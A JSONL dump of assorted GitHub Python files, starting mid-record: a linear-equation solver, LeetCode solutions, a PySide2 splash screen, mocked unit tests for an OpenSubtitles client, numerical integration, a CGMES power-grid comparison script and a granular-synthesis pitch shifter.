2))\n\t\t#print('rid of ' + str(n))\n\t\tif rid_of_col(matrix, right, row, n):\n\t\t\trow = row + 1\n\t\t#print(stringify_matrix(matrix, right, 2))\n\t\t#print('----------------------')\n\t#print(matrix)\n\t\ndef rid_of_tail_zeros(matrix, cols, right):\n\tfor row in range(len(matrix) - 1, -1, -1):\n\t\tif matrix[row][cols - 1] != 0:\n\t\t\treturn True\n\t\tif right[row] != 0:\n\t\t\treturn False\n\t\tdel matrix[row]\n\t\tdel right[row]\n\treturn False\n\t\ndef solve(matrix, cols, right):\n\tmake_triangle(matrix, cols, right)\n\t#print(stringify_matrix(matrix, right, 2))\n\tok = rid_of_tail_zeros(matrix, cols, right)\n\tif not ok:\n\t\treturn 0 # no solutions\n\tif len(matrix) > cols:\n\t\treturn 0 # no solutions, duplicates previous check\n\tif len(matrix) < cols:\n\t\treturn -1 # infinite solutions\n\tx = cols * [0]\n\t\n\tdef calc_x(row, right, n):\n\t\tr = right\n\t\tfor c in range(n + 1, len(row)):\n\t\t\tr = r - row[c] * x[c]\n\t\tk = row[n]\n\t\treturn r / k\n\t\t\n\tfor r in range(len(matrix) - 1, -1, -1):\n\t\tx[r] = calc_x(matrix[r], right[r], r)\n\t\n\treturn x # single solution\n\t\n#print(stringify_matrix(matrix, right, 2))\n#print(solve(matrix, cols, right))\n#print(stringify_matrix(matrix, right, 2))\n\nresult = solve(matrix, cols, right)\nif type(result) is list:\n\ts = ''\n\tfor i in range(0, len(result)):\n\t\tif i != 0:\n\t\t\ts = s + ' '\n\t\ts = s + str(result[i])\n\tprint('YES')\n\tprint(s)\nelse:\n\tif result < 0:\n\t\tprint('INF')\n\telse:\n\t\tprint('NO')","repo_name":"ZzDmitry/linalg","sub_path":"1/ex.py","file_name":"ex.py","file_ext":"py","file_size_in_byte":4335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1438478315","text":"import importlib\nimport torch\nfrom option import args\n\n\nif __name__ == \"__main__\":\n args.model_name = 'EDSR'\n args.angRes_in = 5\n args.scale_factor = 4\n\n device = torch.device(args.device)\n if 'cuda' in args.device:\n torch.cuda.set_device(device)\n\n MODEL_PATH = args.model_name\n MODEL = importlib.import_module(MODEL_PATH)\n net = MODEL.get_model(args).to(device)\n total = sum([param.nelement() for param in net.parameters()])\n print(' Number of parameters: %.4fM' % (total / 1e6))\n","repo_name":"ZhengyuLiang24/BasicLFSR","sub_path":"model/SR/cal_Params.py","file_name":"cal_Params.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","stars":78,"dataset":"github-code","pt":"37"} +{"seq_id":"71942434988","text":"'''\r\nCreated on 1.12.2016\r\n\r\n@author: Darren\r\n''''''\r\n\r\r\nGiven a m x n matrix, if an element is 0, set its entire row and column to 0. Do it in place.\r\r\n\r\r\n\r\r\nclick to show follow up.\r\r\n\r\r\nFollow up:\r\r\n\r\r\n\r\r\nDid you use extra space?\r\r\nA straight forward solution using O(mn) space is probably a bad idea.\r\r\nA simple improvement uses O(m + n) space, but still not the best solution.\r\r\nCould you devise a constant space solution?\r\r\n\r\r\n\" \r\n'''\r\nclass Solution(object):\r\n def setZeroes(self, matrix):\r\n \"\"\"\r\n :type matrix: List[List[int]]\r\n :rtype: void Do not return anything, modify matrix in-place instead.\r\n \"\"\"\r\n if not matrix or not matrix[0]:\r\n return\r\n row_flag,col_flag=False,False\r\n for row in range(len(matrix)):\r\n if matrix[row][0]==0:\r\n row_flag=True\r\n break\r\n for col in range(len(matrix[0])):\r\n if matrix[0][col]==0:\r\n col_flag=True\r\n break\r\n for row in range(len(matrix)):\r\n for col in range(len(matrix[0])):\r\n if matrix[row][col]==0:\r\n matrix[row][0]=0\r\n matrix[0][col]=0\r\n for row in range(1,len(matrix)):\r\n for col in range(1,len(matrix[0])):\r\n if matrix[0][col]==0 or matrix[row][0]==0:\r\n matrix[row][col]=0\r\n if row_flag:\r\n for row in range(len(matrix)):\r\n matrix[row][0]=0\r\n if col_flag:\r\n for col in range(len(matrix[0])):\r\n matrix[0][col]=0\r\n def print_matrix(self,matrix):\r\n for line in matrix:\r\n print(line)\r\nso=Solution()\r\nmatrix=[[0,0,0,5],[4,3,1,4],[0,1,1,4],[1,2,1,3],[0,0,1,1]]\r\nso.print_matrix(matrix)\r\nso.setZeroes(matrix)\r\nprint()\r\nso.print_matrix(matrix)","repo_name":"darrencheng0817/AlgorithmLearning","sub_path":"Python/leetcode/SetMatrixZeroes.py","file_name":"SetMatrixZeroes.py","file_ext":"py","file_size_in_byte":1847,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"38393520780","text":"# A phrase is a palindrome if, after converting all uppercase letters into lowercase letters \n# and removing all non-alphanumeric characters, it reads the same forward and backward. \n# Alphanumeric characters include letters and numbers.\n# Given a string s, return true if it is a palindrome, or false otherwise.\n\n# tips:\n# 用左右指針檢查兩側字母是否相同\n# 字串中的非字母數字可以先移除,或是比較時直接跳過就好\n\n# first try\nclass Solution(object):\n def isPalindrome(self, s):\n \"\"\"\n :type s: str\n :rtype: bool\n \"\"\"\n\n p1, p2 = 0, len(s) - 1\n\n while p1 < p2:\n if not s[p1].isalnum():\n p1 += 1\n continue\n\n if not s[p2].isalnum():\n p2 -= 1\n continue\n\n if s[p1].lower() != s[p2].lower():\n return False\n else:\n p1 += 1\n p2 -= 1\n\n return True","repo_name":"hcygeorge/my-leetcode","sub_path":"string/easy/125. Valid Palindrome.py","file_name":"125. Valid Palindrome.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23870157136","text":"import platform\nimport sys\nfrom PySide2.QtWidgets import QApplication,QMainWindow\nfrom PySide2 import QtCore,QtGui\nfrom ui_Splashp1 import Ui_SplashScreen\nfrom PySide2.QtCore import QTimer\nfrom PySide2.QtWidgets import *\n\ncounter =0 # THIS IS TO SET AN INITVALUE FOR THE COUNTER\n\nclass SplashScreen(QMainWindow):\n def __init__(self):\n super().__init__()\n self.ui = Ui_SplashScreen()\n self.ui.setupUi(self)\n\n # REMOVING THE TITLE BAR\n self.setWindowFlags(QtCore.Qt.FramelessWindowHint)\n self.setAttribute(QtCore.Qt.WA_TranslucentBackground)\n\n\n # TMER -> SET\n self.timer = QtCore.QTimer()\n self.timer.timeout.connect(self.progress)\n # SETTING THE TIME IN MILLISECONDS\n self.timer.start(35)\n \n\n # CHANGING THE DESCRIPTION LABEL \n QtCore.QTimer.singleShot(1500,lambda: self.ui.label_description.setText(\"Using MacosLabs Engines\"))\n QtCore.QTimer.singleShot(4000,lambda :self.ui.label_loading.setText(\"Loading...User Interface\"))\n QtCore.QTimer.singleShot(3600,lambda: self.ui.label_description.setText(\"We Build The Future\"))\n QtCore.QTimer.singleShot(5300,lambda: self.ui.label_description.setText(\"Ready?\"))\n \n\n\n # ==================================\n # SHOW -> MAIN WINDOW\n self.show()\n\n # ==================================\n\n# ===============================================\n# APPLICATION FUNCTIONS -> RECIEVERS\n def progress(self):\n global counter\n\n self.ui.progressBar.setValue(counter)\n\n # LOGIC FOR THE SPLASHSCREEN\n\n if counter > 100:\n\n self.timer.stop()\n\n\n self.close()\n\n counter +=1\n# ================================================\n\nif __name__ == '__main__':\n myapp = QApplication([])\n window = SplashScreen()\n window.show()\n sys.exit(myapp.exec_())\n\n\n","repo_name":"markowusu/SplashScreen","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28093346846","text":"import sys\n\nn = 0\nfor l in sys.stdin:\n line = l.strip()\n if not line:\n print('1')\n n = 0\n else:\n if n % 4 == 0 and n != 0:\n print('0')\n n += 1\n","repo_name":"shohata/Dump_Eater","sub_path":"tlast.py","file_name":"tlast.py","file_ext":"py","file_size_in_byte":163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26236724892","text":"from pythonopensubtitles.opensubtitles import OpenSubtitles\n\nimport base64\nimport json\nimport os\nimport tempfile\nimport unittest\nimport zlib\nimport unittest.mock as mock \n\nclass MockServerProxy:\n pass\n\nclass TestOpenSubtitles(unittest.TestCase):\n def setUp(self):\n self.mock = MockServerProxy()\n self.ost = OpenSubtitles()\n self.ost.xmlrpc = self.mock\n\n def test_login(self):\n self.mock.LogIn = lambda *_: {\n 'status': '403',\n }\n assert self.ost.login('good@mail.com', 'goodpassword') is None\n\n self.mock.LogIn = lambda *_: {\n 'status': '200 OK',\n 'token': 'token',\n }\n assert self.ost.login('good@mail.com', 'goodpassword') == 'token'\n \n def test_search_subtitles(self):\n self.mock.SearchSubtitles = lambda *_: fixture('search_subtitles')\n \n data = self.ost.search_subtitles([])\n \n assert len(data) == 1\n assert data[0].get('IDSubtitle') == '7783633'\n assert data[0].get('IDSubtitleFile') == '1956355942'\n assert data[0].get('IDSubMovieFile') == '19353776'\n\n def test_search_imdb(self):\n self.mock.SearchMoviesOnIMDB = lambda *_: {\n 'status': '200 OK',\n 'data': [\n {\n 'IDMovieImdb': 'id',\n }\n ]\n }\n\n # TODO: not sure if these are the right params. I am just keeping the test because it was on the README\n data = self.ost.search_movies_on_imdb([])\n assert data[0].get('IDMovieImdb') == 'id'\n\n def test_no_operation(self):\n self.mock.NoOperation = lambda *_: {'status': '200 OK'}\n assert self.ost.no_operation()\n\n def test_logout(self):\n self.mock.LogOut = lambda *_: {'status': '403'}\n assert not self.ost.logout()\n\n self.mock.LogOut = lambda *_: {'status': '200 OK'}\n assert self.ost.logout()\n\n def test_auto_update(self):\n self.mock.AutoUpdate = lambda *_: {\n 'status': '200 OK',\n 'version': 'something',\n }\n data = self.ost.auto_update('SubDownloader')\n assert 'version' in data.keys()\n\n def test_already_exists(self):\n self.mock.TryUploadSubtitles = lambda *_: {\n 'status': '403',\n }\n # TODO: The error here is unauthorized and not that the subtitle wasn't found,\n # however, for not breaking compatibility we will keep it this way for now.\n assert not self.ost.try_upload_subtitles([])\n\n self.mock.TryUploadSubtitles = lambda *_: {\n 'status': '200 OK',\n 'alreadyindb': 1,\n }\n assert self.ost.try_upload_subtitles([])\n\n def test_upload_subtitles(self):\n self.mock.UploadSubtitles = lambda *_: {\n 'status': '200 OK',\n 'data': {\n 'url': 'http://example.com',\n },\n }\n data = self.ost.upload_subtitles([])\n assert 'url' in data.keys()\n\n def test_check_subtitle_hash(self):\n self.mock.CheckSubHash = lambda *_: {\n 'status': '200 OK',\n 'data': {},\n }\n data = self.ost.check_subtitle_hash([])\n assert data == {}\n \n def test_check_movie_hash(self):\n self.mock.CheckMovieHash = lambda *_: {\n 'status': '200 OK',\n 'data': {},\n }\n data = self.ost.check_movie_hash([])\n assert data == {}\n\n def test_insert_movie_hash(self):\n self.mock.InsertMovieHash = lambda *_: {\n 'status': '200 OK',\n 'data': {},\n }\n data = self.ost.insert_movie_hash([])\n assert data == {}\n\n def test_report_wrong_movie_hash(self):\n self.mock.ReportWrongMovieHash = lambda *_: {\n 'status': '419',\n }\n assert not self.ost.report_wrong_movie_hash([])\n\n self.mock.ReportWrongMovieHash = lambda *_: {\n 'status': '200 OK',\n }\n assert self.ost.report_wrong_movie_hash([])\n\n def test_report_wrong_movie_hash_404(self):\n self.mock.ReportWrongMovieHash = lambda *_: {\n 'status': '404',\n }\n assert not self.ost.report_wrong_movie_hash('hash')\n\n self.mock.ReportWrongMovieHash = lambda *_: {\n 'status': '200 OK',\n }\n assert self.ost.report_wrong_movie_hash('hash')\n\n def test_get_subtitle_languages(self):\n self.mock.GetSubLanguages = lambda *_: {\n 'status': '200 OK',\n 'data': {},\n }\n assert self.ost.get_subtitle_languages() == {}\n\n def test_get_available_translations(self):\n self.mock.GetAvailableTranslations = lambda *_: {\n 'status': '200 OK',\n 'data': {},\n }\n assert self.ost.get_available_translations('SubDownloader') == {}\n\n def test_subtitles_votes(self):\n self.mock.SubtitlesVote = lambda *_: {\n 'status': '200 OK',\n 'data': {},\n }\n assert self.ost.subtitles_votes({}) == {}\n\n def test_get_comments(self):\n self.mock.GetComments = lambda *_: {\n 'status': '200 OK',\n 'data': {},\n }\n assert self.ost.get_comments([]) == {}\n\n def test_add_comment(self):\n self.mock.AddComment = lambda *_: {\n 'status': '403',\n }\n assert not self.ost.add_comment({})\n\n self.mock.AddComment = lambda *_: {\n 'status': '200 OK',\n }\n assert self.ost.add_comment({})\n\n def test_add_request(self):\n self.mock.AddRequest = lambda *_: {\n 'status': '200 OK',\n 'data': {},\n }\n assert self.ost.add_request({}) == {}\n\n def test_download_subtitles(self):\n self.mock.DownloadSubtitles = lambda *_: fixture('download_subtitles')\n with tempfile.TemporaryDirectory() as tmpdirname:\n data = self.ost.download_subtitles(['id'], output_directory=tmpdirname)\n \n assert data, data\n \n @mock.patch('pythonopensubtitles.opensubtitles.decompress', return_value='test_decoded_data')\n def test_download_subtitles_force_encoding(self, mock_decompress):\n self.mock.DownloadSubtitles = lambda *_: fixture('download_subtitles')\n with tempfile.TemporaryDirectory() as tmpdirname:\n data = self.ost.download_subtitles(['id'], output_directory=tmpdirname, encoding='test_encoding')\n encoded_data=self.ost._get_from_data_or_none('data')\n mock_decompress.assert_called_with(encoded_data[0]['data'], encoding='test_encoding')\n assert data, data\n\ndef fixture(name):\n fullpath = os.path.join(os.path.dirname(__file__), 'fixtures', name+'.json')\n with open(fullpath) as f:\n return json.load(f)","repo_name":"agonzalezro/python-opensubtitles","sub_path":"pythonopensubtitles/test_opensubtitles.py","file_name":"test_opensubtitles.py","file_ext":"py","file_size_in_byte":6768,"program_lang":"python","lang":"en","doc_type":"code","stars":149,"dataset":"github-code","pt":"37"} +{"seq_id":"70968028589","text":"import math\r\n\r\ndef f(x) :\r\n return math.exp(-(1/(x*x)))/(x*x)\r\n\r\ndef Simpson(a, b, h) :\r\n sum = f(a) + f(b)\r\n i = 1\r\n x = a + h\r\n while x < b - h :\r\n if i%2 != 0 :\r\n sum += 4*f(x)\r\n else :\r\n sum += 2*f(x)\r\n x += h\r\n i += 1\r\n return h*sum/3.\r\n\r\ndef rectangles(a, b, h) :\r\n sum = 0\r\n x = a + h * 0.5\r\n while x < b :\r\n sum += f(x)\r\n x += h\r\n sum *= h\r\n return sum\r\n\r\n\r\n\r\n\r\nA = (4*0.0001)**(1/4)\r\nprint(\"A = \", A)\r\n\r\na = A\r\nb = 1.5\r\nh = 0.00005\r\nsimp = Simpson(a, b , h)\r\nh /= 2\r\ndivsimp = Simpson(a, b, h)\r\nerr_val = math.fabs(simp - divsimp)/12.\r\nwhile err_val > 0.0001 :\r\n simp = Simpson(a, b , h)\r\n h /= 2\r\n divsimp = Simpson(a, b, h)\r\n err_val = math.fabs(simp - divsimp)/12\r\nprint(\"I (w eps =< 0.0001) = \", Simpson(a, b, h), \" Error: \", err_val)\r\nrect = rectangles(a, b, h)\r\nh /= 2\r\ndivrect = rectangles(a, b ,h)\r\nerr_val = math.fabs(rect - divrect)/4.\r\nwhile err_val > 0.0001 :\r\n rect = rectangles(a, b, h)\r\n h /= 2\r\n divrect = rectangles(a, b ,h)\r\n err_val = math.fabs(rect - divrect)/4.\r\nprint(\"I (w eps =< 0.0001) = \", rectangles(a, b, h), \" Error: \", err_val)\r\ninput()\r\n","repo_name":"Chapelin14/lab5-1","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19103132816","text":"import sys\nsys.path.append(\"..\")\n\nfrom RDF_parser import load_all_to_dataframe\n\nfrom itertools import permutations\n\nimport pandas\n#from urlparse import urlparse\n\nfrom pyvis.network import Network\nimport pyvis.options as options\nimport os\n\nimport tempfile\n\n\nfrom CGMES_tools import *\n\n\n\n\npandas.set_option(\"display.max_rows\", 15)\npandas.set_option(\"display.max_columns\", 6)\npandas.set_option(\"display.width\", 1000)\n\n\n##paths = [r\"C:\\Users\\kristjan.vilgo\\Downloads\\results_CVG\\20190116T0930Z_1D_CGMEU_SV_000.zip\",\n## r\"C:\\Users\\kristjan.vilgo\\Downloads\\20190116_0930Z_ELES_HOPS_NOSBIH_TNA\\20190116T0930Z_1D_CGMCE_SCC_SV_000\\20190116T0930Z_1D_CGMCE_SCC_SV_000.xml\",\n## r\"C:\\Users\\kristjan.vilgo\\Downloads\\20190116T0930Z_1D_AMICA_merged_model_RGCE_Prague_meeting\\20190116T0930Z_1D_CGMCE_SV_002.zip\",\n## r\"C:\\Users\\kristjan.vilgo\\Downloads\\2019016_0930Z_ELES_HOPS_NOSBIH_PowerFactory\\3TSOsMerge\\20190116T0930Z_1D_Abildgaard_SV_001\\20190116T0930Z_1D_Abildgaard_SV_001.xml\",\n## r\"C:\\Users\\kristjan.vilgo\\Downloads\\export\\20190325T1722Z_1D_CGMBA_SV_001\\20190325T1722Z_1D_CGMBA_SV_001.xml\",\n## r\"C:\\Users\\kristjan.vilgo\\Downloads\\IGM_data.zip\",\n## r\"C:\\Users\\kristjan.vilgo\\Downloads\\20190304T0000Z_ENTSO-E_BD_001.zip\"]\n\n\n##paths = [r\"C:\\IOPs\\IOP100419\\RSC_MERGE\\20190410_0930_Convergence_results_ELES_HOPS_NOSBIH\\20190410T0930Z_1D_CGMEU_SV_001.zip\",\n## r\"C:\\IOPs\\IOP100419\\RSC_MERGE\\20190410_0930Z_PowerFactory_ELES_HOPS_NOSBIH\\EMF2019-04-10_0930Z_ELESHOPSNOSBIH\\19700101T0000Z_1D_PowerFactory_SV_001.zip\",\n## r\"C:\\IOPs\\IOP100419\\RSC_MERGE\\20190410_0930Z_SCC1_results_ELES_HOPS_NOSBIH\\2\\20190410T0930Z_1D_CGMCE_SCC_SV_001.zip\",\n## r\"C:\\IOPs\\IOP100419\\RSC_MERGE\\20190410T0930Z_1D_BALTICRSC_CGMCE_001\\20190410T0930Z_1D_BALTICRSC_CGMCE_001\\20190410T0930Z_1D_CGMBA_SV_001.zip\",\n## r\"C:\\IOPs\\IOP100419\\RSC_MERGE\\20190410T0930Z_1D_small_merge_AMICA\\20190410T0930Z_1D_CGMCE_SV_002.zip\",\n## r\"C:\\IOPs\\IOP100419\\RSC_MERGE\\20190410T0930Z_NRSC_Merge_ELES_HOPS_NOSBIH\\20190410T0930Z_1D_CGMNO_SV_001.zip\",\n## r\"C:\\Users\\kristjan.vilgo\\Downloads\\20190304T0000Z_ENTSO-E_BD_001.zip\",\n## r\"C:\\IOPs\\IOP100419\\RSC_MERGE\\IGM_TP_EQ.zip\"\n##]\n\n\n# Define here paths that you want to load. Load only SV files you want to compare, usually CGM SV files\npaths = [r\"C:\\IOPs\\IOP150519\\RSC_MERGE\\20190515T0930Z_1D_BALTICRSC-CE_002.zip\",\n r\"C:\\IOPs\\IOP150519\\RSC_MERGE\\20190515T0930Z_1D_CORESO-CE_002.zip\",\n r\"C:\\IOPs\\IOP150519\\RSC_MERGE\\20190515T0930Z_1D_HANS-CE_004.zip\",\n r\"C:\\IOPs\\IOP150519\\RSC_MERGE\\20190515T0930Z_1D_TSCNET-CE_003_distributed_slack.zip\",\n r\"C:\\Users\\kristjan.vilgo\\Downloads\\20190304T0000Z_ENTSO-E_BD_001.zip\",\n r\"C:\\IOPs\\IOP150519\\RSC_MERGE\\IGM.zip\"\n ]\n\n\ndata = load_all_to_dataframe(paths)\n\n\n\nloaded_profiles = data.type_tableview(\"FullModel\")[[u'Model.created', u'Model.description', u'Model.modelingAuthoritySet', u'Model.profile', u'Model.scenarioTime', u'Model.version']] #\nprint(loaded_profiles)\n\ncomparison_dict = {\"statistics\":{}, \"data\":{}, \"report\":{\"Instances\": loaded_profiles}}\nSV_UUID_list = data.query(\"VALUE == 'http://entsoe.eu/CIM/StateVariables/4/1'\").ID.tolist()\n\nEMF_namelist = []\n\nfor SV_UUID in SV_UUID_list:\n\n instance_data = data.query(\"INSTANCE_ID == '{}'\".format(SV_UUID))\n authority = instance_data.query(\"KEY == 'Model.modelingAuthoritySet'\").VALUE.item()\n\n try:\n EMF_name = urlparse(authority).netloc\n\n except:\n print(\"No modelling authorityset found or invalid url -> {}, using SV UUID\".format(authority))\n EMF_name = SV_UUID\n\n\n comparison_dict[\"statistics\"][\"{}\".format(EMF_name)] = instance_data.types_dict()\n comparison_dict[\"data\"][\"{}\".format(EMF_name)] = instance_data\n\n EMF_namelist.append(EMF_name)\n\n\nstatistics = pandas.DataFrame(comparison_dict[\"statistics\"])\ncomparison_dict[\"report\"][\"SvStatistics\"] = statistics\nprint(statistics)\n\n\n# Add here parameters to compere and at what index\nsettings = [dict(index = \"SvTapStep.TapChanger\", merge_column = \"SvTapStep.position\"),\n dict(index = \"SvPowerFlow.Terminal\", merge_column = \"SvPowerFlow.p\"),\n dict(index = \"SvPowerFlow.Terminal\", merge_column = \"SvPowerFlow.q\"),\n dict(index = \"SvVoltage.TopologicalNode\", merge_column = \"SvVoltage.v\"),\n dict(index = \"SvVoltage.TopologicalNode\", merge_column = \"SvVoltage.angle\")]\n\n#data.query(\"VALUE == 'ControlArea'\")\n\n# Create all comparison tables\nfor setting in settings:\n\n column_name = setting[\"merge_column\"]\n type_name = setting[\"merge_column\"].split(\".\")[0]\n\n comparison_dict[column_name] = {}\n comparison_data = pandas.DataFrame()\n\n for SV_UUID in comparison_dict[\"data\"].keys():\n\n rename_dict = {column_name:SV_UUID}\n\n data_view = comparison_dict[\"data\"][SV_UUID].\\\n type_tableview(type_name).\\\n set_index(setting[\"index\"])\\\n [[column_name]].\\\n rename(rename_dict, axis = \"columns\").\\\n apply(pandas.to_numeric, errors = \"ignore\")#, drop = False) # use .reset_index() before .set_index() to keep result UUID\n\n comparison_data = comparison_data.join(data_view, how = \"outer\")\n\n # Report all SV combinations\n combinations = permutations(comparison_dict[\"data\"].keys(), 2)\n\n for combination in combinations:\n\n diff_column_name = \"<{}> - <{}>\".format(combination[0], combination[1])\n comparison_data[diff_column_name] = comparison_data[combination[0]] - comparison_data[combination[1]]\n\n comparison_dict[\"report\"][column_name] = comparison_data\n\n # Add statistics\n\n #columns = [u' - ', u' - ', u' - ', u' - ']\n\n comparison_dict[\"report\"][column_name + \"_\" + \"statistics\"] = comparison_dict[\"report\"][column_name][EMF_namelist].describe()\n\n##excel_writer = pandas.ExcelWriter(r\"C:\\IOPs\\IOP150519\\RSC_MERGE\\SV_comparison_150519.xlsx\")\n##\n##for report in comparison_dict[\"report\"].keys():\n## comparison_dict[\"report\"][report].to_excel(excel_writer, sheet_name = report)\n##\n##excel_writer.save()\n\n\nprint(loaded_profiles[loaded_profiles[\"Model.profile\"]==\"http://entsoe.eu/CIM/StateVariables/4/1\"])\n\nprint(\"all data is avaialbel in 'comparison_dict'\")\nprint(comparison_dict.keys())\n\n##relations_from('000319d5-61de-4ed8-a5a3-9058d85012d1')\n\n# Generate classical data views needed to extract relevant data\n\nACLineSegments = data.type_tableview(\"ACLineSegment\")\nTerminals = data.type_tableview(\"Terminal\")\n\nPowerTransformerEnds = data.type_tableview(\"PowerTransformerEnd\")\nSynchronousMachines = data.type_tableview(\"SynchronousMachine\")\n\n#PowerTransformers = data.type_tableview(\"PowerTransformer\")\n\nSynchronousMachines = pandas.merge(SynchronousMachines.reset_index(), Terminals.reset_index(), suffixes=('', '_Terminal'), how = \"inner\", left_on = \"ID\", right_on = 'Terminal.ConductingEquipment')\n\n# Query for referenced object\nGeneratingUnits = tableview_by_IDs(data, SynchronousMachines,\"RotatingMachine.GeneratingUnit\")\nRegulatingControls = tableview_by_IDs(data, SynchronousMachines,\"RegulatingCondEq.RegulatingControl\")\n\n# Add data from referenced objects\nSynchronousMachines = pandas.merge(SynchronousMachines, GeneratingUnits, left_on = \"RotatingMachine.GeneratingUnit\", right_index = True, how= \"inner\", suffixes=('', '_GeneratingUnit'))\n\n\n\n\nsv_profiles = loaded_profiles[loaded_profiles[\"Model.profile\"]==\"http://entsoe.eu/CIM/StateVariables/4/1\"]\n\nfor UUID, row in sv_profiles.iterrows():\n\n authority = row['Model.modelingAuthoritySet']\n\n try:\n EMF_name = urlparse(authority).netloc\n\n except:\n print(\"No modelling authorityset found or invalid url -> {}, using SV UUID\".format(authority))\n EMF_name = SV_UUID\n\n SvVoltages = data.query(\"INSTANCE_ID == '{}'\".format(UUID)).type_tableview(\"SvVoltage\").add_prefix(EMF_name + \"_\")\n SvPowerFlows = data.query(\"INSTANCE_ID == '{}'\".format(UUID)).type_tableview(\"SvPowerFlow\").add_prefix(EMF_name + \"_\")\n\n SynchronousMachines = pandas.merge(SynchronousMachines, SvVoltages, suffixes=('', '_SvVoltage'), how = \"inner\", left_on = 'Terminal.TopologicalNode', right_on = EMF_name + '_SvVoltage.TopologicalNode')\n SynchronousMachines = pandas.merge(SynchronousMachines, SvPowerFlows, suffixes=('', '_SvPowerFlow'), how = \"inner\", left_on = 'ID_Terminal', right_on = EMF_name + '_SvPowerFlow.Terminal')\n\n\n\n\n\n","repo_name":"Haigutus/USVDM","sub_path":"Tools/RDF_PARSER/examples/compare_SV.py","file_name":"compare_SV.py","file_ext":"py","file_size_in_byte":8636,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"} +{"seq_id":"19121575459","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Oct 23 15:24:40 2021\n\nGRANULAR SYNTHESIS in python\n\n@purpose\nThe focus is on real-time pitch shifting implementation using python\nReal time implying low-latency and with a live signal as opposed to recorded\nThe algorithm will be converted to C++ to port/send to an microcontroller board\nThe board is to be used bare metal (no operating system or anything)\nAt the moment the teensy is going to be used to interface the MIDI with the code\n\n\"\"\"\n\nimport struct\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.io import wavfile\nimport wave\nimport sys\n\n###############################################\n# steps\n###############################################\n#1)resample original signal\n# * figure out length of singal\n# *figure out number of samples\n# *OR samples per time frame\n#2)buffer\n#3)window (tapered) /corssfade apply\n##################################################\n\n #Functions\n \n#This function is simple fractional resampling as a linear interpolation between the current and next sample\ndef get_subsample(x, t):\n n = int(t)\n a = 1.0 - (t - n)\n try:\n return a * x[n] + (1 - a) * x[n + 1] \n except IndexError:\n try:\n return a * x[n]\n except IndexError:\n return 0\n \n#This is running through the original signal and sampling it at a desired rate realtive to the wanted pitch \ndef resample(x, factor):\n # length of the output signal after resampling\n n_out = int(np.floor(len(x) / factor))\n y = np.zeros(n_out)\n for n in range(0, n_out):\n y[n] = get_subsample(x, float(n) * factor)\n return y\n\n#This is converting miliseconds into a number of samples, which is merely a formula\ndef milliseconds2samples(ms, sampleRate):\n ms2Samp = int(float(sampleRate) * float(ms) / 1000.0)\n return ms2Samp\n \n\n#This is the tapering window to be used for the grains for smooth overlap\ndef win_taper(N, overlap):\n R = int(N * overlap / 2)\n r = np.arange(0, R) / float(R)\n win = np.r_[r, np.ones(N - 2*R), r[::-1]]\n stride = N - R - 1\n return win, stride\n\n#This is the overlap between grainsusing a tapering envelope/window\ndef GS_pshift(x, factor, grain_size, overlap=0.5):\n N = len(x)\n y = np.zeros(N)\n # size of input buffer given target ouptut grain size and resampling factor\n input_chunk_size = int(grain_size * factor + 0.5)\n win, stride = win_taper(grain_size, overlap)\n for n in range(0, len(x) - max(input_chunk_size, grain_size), stride):\n w = resample(x[n:n+input_chunk_size], factor)\n y[n:n+grain_size] += w * win\n return y\n\n#This creates a cosine signal at a fixed frequency\ndef signalGen(freq, Fs, dur):\n wav = np.zeros(Fs*dur)\n t = np.linspace(0, dur, Fs*dur)\n for i in range(t.size):\n wav[i] = np.cos(2*np.pi*freq*t[i])\n return wav\n\n #Main Code\n #TODO: MODIFY THE SETUP CODE ACCORDING TO COMMENTS BELOW.\n \n#IF YOU WANT TO USE A GENERATED SIGNAL, UNCOMMENT THE TWO LINES BELOW\nfreq = 200 #TODO: SET FREQUENCY OF SIGNAL GENERATOR\nsampleRate= 48000\ndataArray = signalGen(freq,sampleRate,2) #TODO: IF YOU WANT TO TEST A SINUSOID, USE THIS. ARG 1 IS NOTE FREQUENCY, ARG 2 IS SAMPLE FREQUENCY (44.1kHz), ARG 3 IS SIGNAL LENGTH IN SECONDS\nplotType =0 #TODO: THIS IS A FLAG TO DO THE CORRESPONDING TYPE OF PLOTTING\n \n#IF YOU WANT TO USE AN INPUT WAV FILE, UNCOMMENT THE FOLLOWING LINES\n#wavFileName =\"\"\n#sampleRate, dataArray = wavfile.read(wavFileName) #TODO: OTHERWISE, SUBSTITUTE THE FILENAME WITH SOME OTHER FILE\n#plotType =1 #TODO: THIS IS A FLAG TO DO THE CORRESPONDING TYPE OF PLOTTING\n \n#Convert stereo signals to mono\nif dataArray.shape[0] == 2:\n dataArray = (dataArray[...,0] + dataArray[...,1])/2\n\n\n# You can change these values to see the different effects.\ngrainInms = 120\npitch = 1.7 # 1=original pitch, <1 = lower in pitch, >1 = higher in pitch\noverlapGrainWindow =.5 #25%\n\n#convert to float and put between range of [-1, 1], max of range of int (-32768 to 32767)\nrange1Neg1 = dataArray /32767.0\n\ngrain_size = milliseconds2samples(grainInms, sampleRate)\n\npitchShiftedDataArray = GS_pshift(range1Neg1, pitch, milliseconds2samples(grainInms, sampleRate), overlapGrainWindow)\n\npitchShiftedDataArray = (pitchShiftedDataArray *2**15)\n\nwavfile.write(\"PitchShiftedOutput.wav\", sampleRate, pitchShiftedDataArray.astype(np.int16))\n #End Of Main Code\n\n\n #Visualing and Analyzing the audio signals\n\n#######################signwave plotting\nif plotType==0 :\n #Input Signal\n plt.plot( dataArray[0:])\n plt.xlim(0,10000)\n # display the plot\n plt.show()\n\n #Output Signal\n 